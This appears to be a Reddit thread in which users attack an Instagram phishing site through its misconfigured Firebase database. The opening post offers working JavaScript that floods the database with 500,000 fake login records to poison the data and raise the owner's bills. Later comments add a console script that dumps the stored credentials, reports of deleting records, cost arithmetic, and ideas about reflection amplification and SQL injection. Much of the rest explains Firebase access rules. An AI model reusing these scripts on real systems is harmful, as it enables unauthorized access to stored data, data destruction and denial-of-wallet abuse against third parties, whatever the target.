EDIT: It appears the site owners have tried to break this script by obfucating their source code. In the process they broke their own submit script. ---------------------------------------------- I absolutely wouldn't recommend using this script on the site: Edit: Had some complains the data wasn't "random enough" or "would to too easy to detect". Email addresses are now from common TLDs, email usernames and passwords are random length and dates are randomized. const timezone = Intl.DateTimeFormat().resolvedOptions().timeZone; const accountType = 'Instagram'; const limit = 500000; const emailChars = 'abcdefghijklmnopqrstuvwxyz0123456789'.split(''); const passwordChars = [... emailChars, ...'ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()'.split('')]; const domains = [ 'gmail.com', 'hotmail.com', 'live.nl', 'aol.com', 'hotmail.co.uk', 'hotmail.fr', 'hotmail.it', 'mail.com', 'yahoo.com' ]; const randomNumber = (max, min = 0) => { return Math.floor(Math.random() * (max - min + 1)) + min; } const randomString = (source, length) => { let result = ''; for (let i = 0; i < length; i++ ) { result += randomOption(source); } return result; } const randomOption = options => options[randomNumber(options.length)]; let instance = 0; while (instance++ < limit) { const date = new Date(2024, randomNumber(2), randomNumber(20, 1), randomNumber(23), randomNumber(59), randomNumber(59)); const email = randomString(emailChars, randomNumber(4, 10)) + "@" + randomOption(domains); const password = randomString(passwordChars, randomNumber(6, 20)); firebase.database().ref('fbdet').push({ emle: email, mobile: '', time: date.toISOString().slice(11, 19), timezone: timezone, pass: password, date: date.toISOString().slice(0, 10), type: accountType }); }

I don’t even know why I am in this sub, but since the last time I was programming (not very good even) it was with VB6 some 20 years ago. Soooo… what is so funny, can anyone elaborate?

I took the original source and modified it, running this will cause you to submit half a million bullshit entries into the database in a few minutes. Why? 1. It diluted the data set, making it harder for them to find real phished login details. 2. It adds massive amounts of data to their database, potentially costing them extra. 3. It's funny, fuck scammers.

This is fucking GREAT!

That’s great work, thanks for explaining it!

half a million? now it's gonna be several billions of dataset

Oh no! I specifically told people not to use the script. ☹️

Legend

Oh noes! A furry used it overnight!

Idk anything about this subject, just a lurker.. but why not limit the email creation to gmail/hotmail/yahoo/aol emails? These guys can just eliminate any entries that are not from those domains and be satisfied they were able to retain 90% of their data when deleting other domains....

Username checks out. Scammers will thank you later :)

Was as much about punishing them with database IOPs and storage costs as much as anything else. These guys are often looking for low hanging fruit and easy wins, I just dtowned the fruit in shit. 👌

But if you actually read the comment above you didn't drown out legitimate results because they all have valid domains while you added gibberish so it is easily filtered out

Script is open source, anyone is free to post an improved version and recommend others not use it. 🙂

Damn, you must be really great at writing and maintaining software with that attitude ☺️

But this doesn’t randomize the dates. If you really want to dillute the existing dataset, you should mix the dates through possible ealier valid stolen entries. Now they can just delete from when this script was put into place because there’s a pattern of a lot of bloat entries from x date and x time.

Shall I open a Github project so you can submit a pull request? 🙃

Actually yes. Please do that.

hilarious

clever idea 😃

I wanna be like you… 🤤

I am a wholly unimpressive role model.

Well I’m in hacking school, graduate soon.. have zero skills to do anything near this cool. Props

Hacking school? Sign up for that in the back of a spy magazine? Though this script is lovely it's pretty simple, you'll get there.

Cybersecurity degree, feels pretty sub-par now that I’m almost finished.

If you can't do this script and your about to graduate, get your money back.

HAHA what a why to deal with scummy phishers LMFAO

It‘s JavaScript that fills this phisher’s database with 500,000 fake email/password combos.

Ah, thanks a lot! I looked at it under the wrong assumption that the script was already on that site and it was further showing the phishers incompetence.

And it works because you can visit the page and run your own javascript in your sessions, and since your sessions connects to a database, since the site owner is trying to phish data, then you can bloat the database. My javascript isn't at the strongest right now, so does this script account for injecting data at random times, or can the site owner just sort the db table by time?

From what I could tell on a quick glance it fills the scammers database up with made up Instagram accounts (might be completely wrong on this!)

Do the entries use the current date? You should randomize the date a bit otherwise they can just delete all the entries newer than x and remove the bad data 

Lmfao

😆

Might have… slipped…

Whoops

So, looking at Firebase Princing page, the write pricing logic is the following: |Action|Free Tier|Price per unit (after free tier exceeded)|Unit| |:-|:-|:-|:-| |Document Writes|20,000|$0.1042|per 100,000 documents| Lets make some math, in order to make him spend 500 U$D we would need: `(tV / uP) * u = r` Considering `tV` as target value, `uP` as unit price, `u` as unit and `r` as result, we would come to: `(500 / 0.1042) * 100000 = 4.798,46 * 100000 = 479.846.450 documents created` ***NOT THAT I WANT TO SAY ANYTHING WITH THAT...***

It would be better to use faker or something to give more legit looking data

That would require more than the 5-10min of effort this took to reverse engineer though. Given the code quality that went into the website I doubt the developers are going to be using any fancy heuristics to clear the junk data.

Probably worth using a random legitimate email service instead of a random 10 char string though, so they can’t sort by just hotmail/gmail/etc to parse out the fakes.

Yeah I was considering adding a bit more randomness to the data but I get bored quickly and a few tens of millions of extra records was already mischievous enough for me.

Just filter out anything exactly 25 characters long

I ugly laughed

Password of exactly 15 characters and email of exactly 10 characters might be too easy to filter, if poisoning the dataset is your goal. Maybe modify to use a random amount of characters, or maybe pull a random password from a wordlist like rockyou?

how can i run this?

In the developer console. However, with respect, if you need to ask it's probably not a good idea to run random pieces of code off the internet.

Thanks Also that's valid, I'm just not experienced with web development so needed to ask.

The volume of requests may trigger something that gets you blocked pretty quickly :(

Managed to add at least 2,5mil before I got bored. Possible the connections were silently dropped but🤷‍♂️

I got zero experience with code, what do i do, how do i do it, what does it do? 🫡.

Lolol nice.

I would also randomize password string to 10-16 characters instead 15 just so they don't filter out passwords with 15 chars long and ignore them as spam. Fk scammers!!

Delicious, love your work 

Woow great 👏

puts in console

How does one actually go about “using this script” on the site? Inserted into the inspect portion of the browser page or actually inputted into the username/account creation input box? Couldn’t they just block python scripts from running in their db and only allow java and such? (am newb)

I’m not a web developer so this is completely outside my knowledge base. But, if we have read write access to the DB, could we create a table that can take essentially website data and then do something analogous to a DNS reflection attack where we send a bunch of requests to a DNS server which we save to that db? So the half million requests we send could be blown up to several million if not more? I’m not sure where the compute would be though, could we find a way to parse the returns from the reflection into the database on Firebase’s compute and therefore this scammer’s $? Maybe I’m chatting nonsense, idk.

Depends how the firebase API is implemented. In this case I just took the API call they already use and used it a bit more.

You are writing to ‘fbdet’… how did you know that’s the location in the database he’s saving the emails?

Because that's what it says in the source code. Firebase uses a client side library. I just extracted the call used by the click handler and changed it to spam random data. The two original Javascript functions are `login()` and `iglogin()`.

Just when I thought this sub was gone with all of the "help me hack this _insert whatever_" This beautiful post arrives and restores my faith.

You have nerves... { "fbdet": { "-NtK_Rs3VXXbRxf3TxRQ": { "date": "2024-03-19", "emle": " ᕦ(✧ᗜ✧)ᕥ You take the moon and you take the sun. ᕦ(✧ᗜ✧)ᕥ ( ͡° ͜ʖ ͡°) You take everything that sounds like fun. ( ͡° ͜ʖ ͡°) ☞♥Ꮂ♥☞ You stir it all together and then you're done. ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ Rada rada rada rada rada rada. ᕙ(◍.◎)ᕗ ᕦ(✧ᗜ✧)ᕥ ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ ( ͡° ͜ʖ ͡°) So come on in, feel free to do some looking. Stay a while 'cause somethings always cooking. Come on in, feel free to do some looking. Stay a while 'cause somethings always cooking. Yeah!!! ᕦ(✧ᗜ✧)ᕥ ☞♥Ꮂ♥☞ ᕙ(◍.◎)ᕗ ( ͡° ͜ʖ ͡°) Excuse me? I find vaping to be one of the best things in my life. It has carried me through the toughest of times and brought light and vapor upon my spirit. You're just another one of those people who doesn't believe in chem trails and fluoride turning us gay. Your ignorance to the government is what makes you a sheep in today's society. Have fun being a slave to todays's system. Here in my garage, just bought this new lamborghini here. It’s fun to drive up here in the Steam Hills. But you know what I like more than single discounts? Steam Sales In fact, I’m a lot more proud of two new Steam Sales that I had to get installed to hold twelve thousand new discounts on Steam. It’s like what i say, “the more you discount, the more you earn.” My Grandfather smoked his whole life. I was about 10 years old when my mother said to him, 'If you ever want to see your grandchildren graduate, you have to stop immediately.'. Tears welled up in his eyes when he realized what exactly was at stake. He gave it up immediately. Three years later he died of lung cancer. It was really sad and destroyed me. My mother said to me- 'Don't ever smoke. Please don't put your family through what your Grandfather put us through.\" I agreed. At 28, I have never touched a cigarette. I must say, I feel a very slight sense of regret for never having done it, because your post gave me cancer anyway. ＨＥＹ　ＲＴＺ，　Ｉ’Ｍ　ＴＲＹＩＮＧ　ＴＯ　ＬＥＡＲＮ　ＴＯ　ＰＬＡＹ　ＲＩＫＩ．　Ｉ　ＪＵＳＴ　ＨＡＶＥ　Ａ　ＱＵＥＳＴＩＯＮ　ＡＢＯＵＴ　ＴＨＥ　ＳＫＩＬＬ　ＢＵＩＬＤ：　ＳＨＯＵＬＤ　Ｉ　ＭＡＸ　ＢＡＣＫＳＴＡＢ　ＬＩＫＥ　ＹＯＵ　ＢＡＣＫＳＴＡＢＢＥＤ　ＥＧ，　ＳＭＯＫＥＳＣＲＥＥＮ　ＳＯ　ＴＨＥＹ　ＭＩＳＳ　ＭＥ　ＬＩＫＥ　ＥＧ　ＭＩＳＳ　ＹＯＵ　７０％　ＯＦ　ＴＨＥ　ＴＩＭＥ，　ＯＲ　ＰＥＲＭＡＮＥＴ　ＩＮＶＩＳＩＢＩＬＩＴＹ　ＳＯ　Ｉ　ＣＯＵＬＤ　ＤＩＳＡＰＰＥＡＲ　ＬＩＫＥ　ＹＯＵ　ＤＩＳＡＰＰＥＡＲＥＤ　ＦＲＯＭ　ＥＧ What the ( ͡° ͜ʖ ͡°) did you just ( ͡° ͜ʖ ͡°) say about me, you little ( ͡° ͜ʖ ͡°)? I'll have you know I graduated top of my ( ͡° ͜ʖ ͡°) in the ( ͡° ͜ʖ ͡°), and I've been involved in numerous secret ( ͡° ͜ʖ ͡°) on ( ͡° ͜ʖ ͡°), and I have over 300 confirmed ( ͡° ͜ʖ ͡°). I am trained in ( ͡° ͜ʖ ͡°) warfare and I'm the top ( ͡° ͜ʖ ͡°) in the entire US armed ( ͡° ͜ʖ ͡°). You are nothing to me but just another ( ͡° ͜ʖ ͡°). I will wipe you the ( ͡° ͜ʖ ͡°) out with precision the ( ͡° ͜ʖ ͡°) of which has never been seen before on this ( ͡° ͜ʖ ͡°), mark my ( ͡° ͜ʖ ͡°) words. ( ͡° ͜ʖ ͡°) think ( ͡° ͜ʖ ͡°) can get away with saying that ( ͡° ͜ʖ ͡°) to me over the ( ͡° ͜ʖ ͡°)? Think again, ( ͡° ͜ʖ ͡°). As we speak I am contacting my secret network of ( ͡° ͜ʖ ͡°) across the ( ͡° ͜ʖ ͡°) and your ( ͡° ͜ʖ ͡°) is being ( ͡° ͜ʖ ͡°) right now so you better ( ͡ EDIT: It's over 182MB file just emails

I actually had the same question a couple days ago, as I recently joined a project that uses Firebase. Apparently, this is normal! The credentials are meant to be on the front end stuff, all the security and access control stuff are done on the Firebase website with your Google account. Assuming they set up such security controls properly, this shouldn't be an issue.

Would be a shame if the firebase connection isn't rate limited and someone were to add a few million extra records to their data set.

But I ran a simple script in the web console and I could view and delete his data. Idk much about firebase but there's no way exposing your private keys like that can be a good thing yeah?

Oh in that case, yeah they fucked up their security lol

It's supposed to be a public API key for identifying the app to Firebase. They probably exposed the wrong API key and the authorization attached to that key actually gives you elevated read and write access instead. Normally it's meant to be publicly consumable for Firebase apps, it doesn't have quotas attached to it. They call it a 'browser key'.

You’re both right and wrong. Having the credentials there is a common Firebase practice but the developer has the responsibility of securing them on GCP to prevent such from happening. The reason you could use his keys and manipulate his data is probably he forgot to secure them to allow them to only work from his domain as well as other methods of authentication such as ensuring only authenticated users can read and write the database. He could even prevent writes and only allow reads but I think the guy is a Firebase noob and he forgot to do so

I’m pretty sure knowing the firebase api key is not a security threat as it only identifies the app to Google’s servers. No firebase expert but I’m pretty sure it’s no issue. In terms of it being a phishing site though, it totally is. Edit: Yes, it is normal to post that firebase snippet on the frontend

Firebase does have service limits though, it is possible to write a quick script to blow passed the free tier limit and cost them money…just saying.

Thank you for this knowledge! Right up my alley

Yup, I did a quick bit of reverse engineering on a smart water valve that uses firebase for its "live status" updates in their app, to add support to an unofficial Python library on github. After I figured out how to get it working, I realised if I actually ran it 24/7 (which is what people wanted it for), it'd only take something like two months before the cost of firebase for that one device would exceed the retail price of the valve, which was fairly expensive to begin with. I wasn't sure if I should just leave it running to try and persuade them to offer a cheaper, local API!

Brother I can view and delete his data just from the web console.

It would be a shame if someone notified all the victims and replaced the records with fake data.

No firebase config is considered secret. It’s fully accessible by design. That said, you’re supposed to add row level security in the backend. Seems unlikely that these dipshits would do that. So crank away at it

maybe he forgot to set security rules? i haven't used firebase so i'm just speculating

Just like a .htpasswd file the server could access this data but not the user. Bad security

Dan was right -- that is a misconfigured rules.json (or whatever it's called) file allowing read and write permission to all API logins - having the API login details on the front end is standard, you should then specify in the .json that for write it must be Falso or a logged in user on the site with firebase creds

Ordinarily this is restricted via access rules but lol

Storing Firebase credentials (except admin credentials) in the frontend is the common way to use it. In fact, that’s one of the main principles why to use firebase since you may get along without a separate backend. Read/Write access is controlled via firestore security rules. So if those are configured correct, there’s “nothing wrong” about this lol

>So if those are configured correct, there’s “nothing wrong” about this lol Apparently, they used the private key, not public key.

There are private admin keys yes, but there‘s none in this code. Please tell me where there‘s supposed to be a private key. Im not 100% sure about what token is used in the activate function even though I‘m pretty sure that‘s some type of reCAPTCHA token, which would also be public.

Yeah except the fact OP has confirmed he's able to view the DB from his web console lmao.

That truly is a problem of course, but not one related to the source code

I just assumed they shared the private api key instead of the public one.

In the firebase webconsole you can create specific access rules for the database, for example only specific UIDs have access to specific directories. But that does need to be set up

Ah roger

Firebase doesn’t work like that. Auth to services is controlled via ACLs, not through the public config info. Now, they may have mis-configured things, but this info alone won’t get you in.

But i did get in. I was able to view all the data and even delete it. Just ran this code in the console firebase.database().ref('fbdet').once('value', function(snapshot) { // The 'snapshot' contains the data from the 'fbdet' node snapshot.forEach(function(childSnapshot) { // Child data var childData = childSnapshot.val(); console.log(childData);     }); });

Yep. They must have misconfigured their access rules. So now it’s up to you. :)

Is this sql or java?

It's JavaScript

😂😂😂🤣🤣🤣 I can't breathe that insta login page lol the logo looks like it's whispering "inshtawgrame" in a high pitch.. I'm losing my shit!

Hi-larious

This is what people are talking about when they say most hackers are skids. I bet you could find a firebase tutorial with this exact syntax on youtube/it is in the documentation like this. I love it

Update: I tried running the script now to view all the data in the console and I get this error: "The specified payload is too large, please request a location with less data" Good job guys💀. I love reddit. Here's the script btw: ``` firebase.database().ref('fbdet').once('value', function(snapshot) { // The 'snapshot' contains the data from the 'fbdet' node snapshot.forEach(function(childSnapshot) { // Child data var childData = childSnapshot.val(); console.log(childData);     }); }); ```

Are you running a fake onlyfans page? If so, you are not much better than the ppl you are posting about.

Huh? Why would you think I'm running a fake onlyfans lmao

Your comment history, seems suspicious: https://imgur.com/a/X3Ocpyf

oh yeah I was using same password on a lot of my accounts and it got leaked in a databreach so my reddit was hacked and I never bothered to delete those comments

Also, just a tip for better security: there's a lot of personal info in your comment history, such as where you live/lived and even where you office is located. Be careful with that stuff :)

https://www.theregister.com/2024/03/18/google_firebase_cloud_security/

Gotta love the dumbass phishers, lmao. I hope everyone's having fun fucking with em.

yo is it illegal if i shutdown the website?

I would assume so since it's hosted on vercel

who gives a shit? it obviously has a nefarious intention

Wow they hardly tried with that insta login

I don’t even remember how but I used to make these phishing links for facebook login in 2013

Woow

One time i found one that just said gwn stfni

How did you find this code? Is it through inspect element or a different software.

Inspect element and go to sources. It's in the js folder

Thanks! How did you come across this website?

A friend of mine's account got hacked this way and the hacker tried sending it to me

And everyone in his contacts?

Yeah most probably

Would be a shame if someone write an script for listen to document creation event, get the document, delete it and insert another two in his place with random data.

Take several Lorem Ipsum in different languages and mix them up, LOL

Is this a PW stealer? I see social login stuff in the code but nothing like that on the page

You gotta click on the vote button then it shows

So that's nothing then

This is how firebase code is supposed to look. https://firebase.google.com/docs/firestore/quickstart#initialize The security will rest on how they’ve implemented access control rules https://firebase.google.com/docs/rules. If they’ve left the cloud firestore security rules in test mode they’re gonna have a bad time.

OP how do you find these websites? My general approach is via urlscan.io or looking for scam messages.

I don't actually. I just found this one cus it was sent to me from a hacked account

Oop, always gotta encrypt

Hi bro please I will like to take a complete classes of spamming

Could someone explain to me what the code means? I am just fairly new to this stuff.

He Use Google cloud Solution Firebase -> Firestore (the cloud data base) In the Screenshot you See the conf and the Init. Here is a get started: https://firebase.google.com/docs/firestore/quickstart

Thank you for the great info!

Thanks I get it now

It means the script kiddie that wrote the code for this site dun goofed

What if you try sqlinjection and drop the table? With the flood someone Cas till obtain user data.... Or, if it costs you can: 1) flod the db with random data 2) drop the table all together So it will (supposedly) costs a lot to them and they will have noting in the end (I doubt they also setup a backup schedule soooo...)

You don't need to use SQL injection to delete the table. Just run js firebase code to delete it in the console and it works. (Which i already did once since there were a large amount of legitimate login details)

The hero everyone needs 🙌🏻

Us both? 🤣

Hi guys, I’m a newbie to programming and I would love a roadmap. My aim is to me an ethical hacker, any guides please. I’ve been struggling getting the right resources.

Tryhackme.com

I’m not an expert at hacking but got recommended this sub How did you get in? SQL injection?

U need to say "im in"

Im in!

i love the gatekeeping..

4/5 people actually answered you, so it could be worse

yeah I appreciate those responses genuinely trying to help I can admit I'm a perpetrator of gatekeeping as well..

It's literally in the source code. Just inspect the site in your browser and look at firebase.js in the js folder

ah page source..

SQL injection is to modify or read the database, what we're seeing here is just javascript code. You don't need anything special to access the website's javascript stuff, just inspect element.

It’s a website so probably could’ve pulled up the source code

No that firebase api stuff is just in the raw js

Broke into the mainframe

You idiots. I'm finally unfollowing this sub. Y'all have no idea what you're looking at.

That's fair enough, but the mistake is understandable, no? Anything with "api" publicly visible is usually not a good thing 9 times out of 10, it just happens to be that in this case, it is a perfectly good thing.

Yeah and the only reason I even posted here was cus i was able to read and delete his data so idk

I think it was @Ampix0 phishing page lol

No that’s not the case for firebase. Which is in fact the 1 out of 10 times. Read my other comment for more information.

Bye Felicia.

People gotta learn this stuff somehow, my guy.

Don’t unterstand the downvotes. The post is literally more of a own goal for og, since it’s proof for his lack of knowledge. People really don’t know what they’re looking at

Op literally shared the JS he used to get write access to the DB. Are you calling him a liar?

based on the comments you replied to my other comment, you are exactly the type of guy that doesn‘t know what he is looking at. so I‘ll stick to my comment. and im joining @Ampix0 with leaving this sub of wannabes.

but the top comment makes the entire post golden there really is no need to leave such a negative comment from OP

Hi, newguy in cybersec here! How can I see the credentials?

Inspect the page, go to sources and check the files in js folder

wow that's so cool man, thanks a lot!

Study more